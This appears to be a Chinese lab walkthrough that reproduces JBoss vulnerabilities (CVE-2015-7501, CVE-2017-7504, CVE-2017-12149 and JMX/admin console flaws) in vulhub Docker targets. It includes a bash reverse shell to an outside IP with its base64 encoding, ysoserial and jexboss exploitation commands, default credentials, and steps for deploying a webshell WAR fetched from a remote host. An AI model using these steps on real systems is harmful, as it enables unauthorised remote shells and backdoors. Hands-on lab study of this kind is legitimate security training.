JBOSS中间件漏洞复现

CVE-2015-7501

1.开启环境

cd vulhub/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

docker ps

2.访问靶场

3.访问/invoker/JMXInvokerServlet目录

4.将反弹shell进⾏base64编码

bash -i >& /dev/tcp/47.121.191.208/6666 0>&1

复制代码
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC82NjY2IDA+JjE=
复制代码
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC82NjY2IDA+JjE=

使用ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

curl 47.121.191.208:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

5.监听6666端口

反弹成功

CVE-2017-7504

1.开启环境

cd vulhub/jboss/CVE-2017-7504

docker-compose up -d

2.访问靶场

3.访问漏洞地址

/jbossmq-httpil/HTTPServerILServlet

4.使用python3 jexboss.py -u http://47.121.191.208:8080进行getshell

CVE-2017-12149

1.开启环境

cd vulhub/jboss/CVE-2017-12149

docker-compose up -d

2.访问靶场

3.验证漏洞是否存在

访问此/invoker/readonly目录

返回500,说明存在漏洞

4.使用工具检测,执行命令

Administration Console弱⼝令

1.开启环境

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

依旧是此环境

2.首先访问密码文件

密码文件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码:admin:vulhub

3.访问/admin-console/login.seam目录

使用上面的用户名密码进行登录

4.点击web应⽤,上传后⻔ shell.war

5.访问此文件

/shell/shell.jsp

6.测试连接

高版本JMX Console未授权

1.依旧是12149的环境

2.访问/jmx-console/目录

用户名:admin

密码:vulhub

3.在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer

4.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

5.输⼊Invoke

http://47.121.191.208/zxin.war

6.访问zxin.jsp

/zxin/zxin.jsp

7.使用哥斯拉进行测试连接

低版本JMX Console未授权

1.开启环境

cd vulhub-master/jboss/CVE-2017-7504

docker-compose up -d

2.访问靶场

3.访问/jmx-console目录

登录

admin admin

4.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)

5.使用哥斯拉进行测试连接

相关推荐
神工坊3 小时前
仿真科普|CAE技术赋能无人机,低空经济蓄势起飞
中间件·云计算·无人机·云平台·hpc·cae·高性能仿真
shaominjin1231 天前
OpenCV 4.1.2 SDK 静态库作用与功能详解
android·c++·人工智能·opencv·计算机视觉·中间件
信创检测小安2 天前
国产中间件与浏览器选型指南:覆盖政务、金融、电信应用场景
中间件·金融·政务
莫陌尛.3 天前
docker安装中间件
docker·中间件·容器
今天背单词了吗9804 天前
Spring Boot+RabbitMQ 实战:4 种交换机模式(Work/Fanout/Direct/Topic)保姆级实现
java·spring·中间件·rabbitmq·1024程序员节
想睡好4 天前
express中间件(java拦截器)
java·中间件·express
文火冰糖的硅基工坊4 天前
[人工智能-大模型-57]:模型层技术 - 软件开发的不同层面(如底层系统、中间件、应用层等),算法的类型、设计目标和实现方式存在显著差异。
人工智能·算法·中间件
兢兢业业的小白鼠4 天前
Java常用中间件整理讲解——Redis,RabbitMQ
java·中间件·java-rabbitmq·1024程序员节
亿牛云爬虫专家4 天前
中间件实现任务去重与精细化分发:设计模式与常见陷阱
设计模式·中间件·爬虫代理·数据抓取·商品信息·数据去重·电商搜索
9ilk4 天前
【同步/异步 日志系统】 --- 前置技术
笔记·后端·其他·中间件